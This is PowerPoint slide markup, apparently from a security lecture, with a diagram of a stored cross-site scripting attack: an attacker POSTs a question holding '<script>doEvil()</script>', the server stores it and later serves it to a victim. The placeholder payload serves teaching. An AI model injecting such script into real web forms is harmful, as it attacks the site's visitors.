                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="60" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Code:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="80" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;div</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="93" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>’question'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>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98960" y="1196565"/>
            <a:ext cx="9286240" cy="4290060"/>
            <a:chOff x="1724220" y="897423"/>
            <a:chExt cx="6964680" cy="3217545"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="object 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6228147" y="1738017"/>
              <a:ext cx="1708785" cy="1705610"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1708784" h="1705610">
                  <a:moveTo>
                    <a:pt x="1708251" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1705394"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6228138" y="3315465"/>
              <a:ext cx="128270" cy="128270"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="128270" h="128270">
                  <a:moveTo>
                    <a:pt x="33782" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="127939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128003" y="94361"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>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7952808" y="897423"/>
              <a:ext cx="736061" cy="808859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1743270" y="2646346"/>
              <a:ext cx="3823970" cy="1058545"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3823970" h="1058545">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3823550" y="1058341"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5438886" y="3609931"/>
              <a:ext cx="128270" cy="128905"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="128270" h="128904">
                  <a:moveTo>
                    <a:pt x="35572" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="127939" y="94754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="128511"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1762756" y="3096107"/>
              <a:ext cx="3707129" cy="1000125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3707129" h="1000125">
                  <a:moveTo>
                    <a:pt x="3706710" y="999642"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38099">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1762757" y="3061491"/>
              <a:ext cx="128270" cy="128905"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="128269" h="128905">
                  <a:moveTo>
                    <a:pt x="92989" y="128752"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="34607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127711" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>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5EC422"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>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12" name="object 12"/>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13" name="object 13"/>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4" name="object 14"/>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5" name="object 15"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606571" y="4724570"/>
            <a:ext cx="1172355" cy="1542575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8792013" y="3988905"/>
            <a:ext cx="3340100" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1.	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>asks</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9249213" y="4354665"/>
            <a:ext cx="2970953" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question via</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8792012" y="4728554"/>
            <a:ext cx="3247813" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>message:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“&lt;script&gt;doEvil()&lt;/script&gt;”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-67" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4778587" y="2538387"/>
            <a:ext cx="1582420" cy="1494426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Victim </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>questions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6342211" y="3364091"/>
            <a:ext cx="2352885" cy="1125094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773" algn="just">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>retrieves </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DB</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2834199"/>
            <a:ext cx="2479040" cy="1144692"/>
            <a:chOff x="0" y="2125649"/>
            <a:chExt cx="1859280" cy="858519"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="object 23"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2131834"/>
              <a:ext cx="683015" cy="683677"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="object 24"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="660175" y="2136076"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="object 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="653973" y="2130412"/>
              <a:ext cx="1167130" cy="795655"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1167130" h="795655">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621791" y="2253995"/>
              <a:ext cx="1237487" cy="729983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="object 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="667562" y="2276157"/>
              <a:ext cx="1143000" cy="636270"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1143000" h="636269">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8" name="object 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="667562" y="2276157"/>
              <a:ext cx="1143000" cy="636270"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
